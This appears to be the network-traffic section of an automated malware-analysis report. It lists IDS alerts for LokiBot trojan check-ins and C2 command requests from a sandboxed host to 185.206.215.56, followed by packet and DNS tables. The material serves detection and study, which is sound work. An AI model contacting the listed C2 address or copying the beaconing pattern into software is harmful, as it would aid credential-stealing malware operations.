01/05/21-19:06:47.867741 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49270 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.042229 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49270 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:48.254686 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49271 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.254686 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49271 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.254686 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49271 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.254686 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49271 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.422139 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49271 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:48.626007 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49272 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.626007 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49272 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.626007 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49272 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.626007 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49272 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.788675 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49272 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:49.009732 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49273 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.009732 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49273 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.009732 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49273 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.009732 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49273 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.170301 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49273 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:49.377604 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49274 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.377604 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49274 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.377604 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49274 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.377604 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49274 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.549512 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49274 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:49.748267 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49275 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.748267 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49275 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.748267 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49275 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.748267 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49275 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.910769 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49275 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:50.119352 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49276 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.119352 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49276 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.119352 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49276 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.119352 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49276 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.275711 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49276 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:50.486914 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49277 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.486914 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49277 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.486914 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49277 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.486914 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49277 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.662352 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49277 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:50.870071 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49278 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.870071 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49278 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.870071 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49278 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.870071 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49278 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.028077 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49278 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:51.234373 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49279 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.234373 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49279 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.234373 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49279 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.234373 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49279 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.393173 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49279 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:51.603753 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49280 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.603753 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49280 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.603753 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49280 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.603753 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49280 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.756889 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49280 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:51.974612 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49281 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.974612 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49281 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.974612 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49281 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.974612 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49281 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.147882 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49281 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:52.356383 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49282 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.356383 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49282 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.356383 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49282 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.356383 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49282 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.526790 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49282 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:52.728532 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49283 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.728532 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49283 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.728532 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49283 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.728532 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49283 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.923052 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49283 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:53.137321 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49284 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.137321 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49284 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.137321 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49284 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.137321 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49284 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.310694 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49284 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:53.527158 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49285 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.527158 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49285 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.527158 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49285 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.527158 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49285 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.705442 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49285 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:53.922499 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49286 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.922499 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49286 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.922499 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49286 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.922499 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49286 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.077631 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49286 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:54.285753 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49287 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.285753 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49287 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.285753 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49287 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.285753 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49287 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.453918 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49287 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:54.662267 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49288 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.662267 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49288 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.662267 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49288 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.662267 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49288 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.864166 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49288 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:55.070986 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49289 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.070986 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49289 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.070986 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49289 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.070986 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49289 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.223019 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49289 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:55.427131 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49290 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.427131 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49290 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.427131 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49290 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.427131 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49290 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.590567 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49290 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:55.812036 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49291 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.812036 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49291 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.812036 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49291 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.812036 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49291 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.997742 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49291 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:56.213303 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49292 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.213303 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49292 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.213303 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49292 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.213303 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49292 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.397187 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49292 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:56.594263 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49293 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.594263 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49293 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.441718 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49348 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.441718 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49348 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.441718 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49348 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.441718 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49348 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.595691 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49348 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:17.814658 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49349 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.814658 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49349 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.814658 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49349 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.814658 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49349 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.974679 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49349 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:18.170246 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49350 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.170246 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49350 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.170246 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49350 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.170246 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49350 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.342973 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49350 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:18.546784 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49351 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.546784 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49351 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.546784 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49351 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.546784 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49351 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.726488 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49351 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:18.940629 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49352 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.940629 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49352 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.940629 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49352 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.940629 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49352 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.100818 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49352 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:19.314073 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49353 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.314073 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49353 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.314073 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49353 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.314073 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49353 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.472804 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49353 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:19.678882 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49354 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.678882 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49354 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.678882 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49354 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.678882 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49354 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.836989 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49354 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:20.060760 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49355 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.060760 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49355 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.060760 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49355 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.060760 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49355 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.222456 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49355 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:20.437125 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49356 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.437125 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49356 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.437125 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49356 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.437125 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49356 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.607773 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49356 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:20.817267 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49357 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.817267 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49357 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.817267 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49357 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.817267 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49357 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.984601 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49357 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:21.198560 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49358 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.198560 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49358 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.198560 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49358 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.198560 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49358 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.387078 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49358 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:21.572190 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49359 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.572190 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49359 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.572190 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49359 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.572190 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49359 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.741504 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49359 | 185.206.215.56 | 192.168.2.22 |
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 5, 2021 19:05:20.671252966 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 19:05:20.727847099 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Jan 5, 2021 19:05:21.293368101 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 19:05:21.351258039 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Jan 5, 2021 19:05:21.357091904 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 19:05:21.415157080 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Jan 5, 2021 19:05:22.378812075 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 19:05:22.447736979 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 5, 2021 19:05:20.671252966 CET | 192.168.2.22 | 8.8.8.8 | 0xad13 | Standard query (0) | | A (IP address) | IN (0x0001) |
Jan 5, 2021 19:05:22.378812075 CET | 192.168.2.22 | 8.8.8.8 | 0x1175 | Standard query (0) | | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 5, 2021 19:05:20.727847099 CET | 8.8.8.8 | 192.168.2.22 | 0xad13 | No error (0) | | | 104.22.0.232 | A (IP address) | IN (0x0001) |
Jan 5, 2021 19:05:20.727847099 CET | 8.8.8.8 | 192.168.2.22 | 0xad13 | No error (0) | | | 172.67.8.238 | A (IP address) | IN (0x0001) |
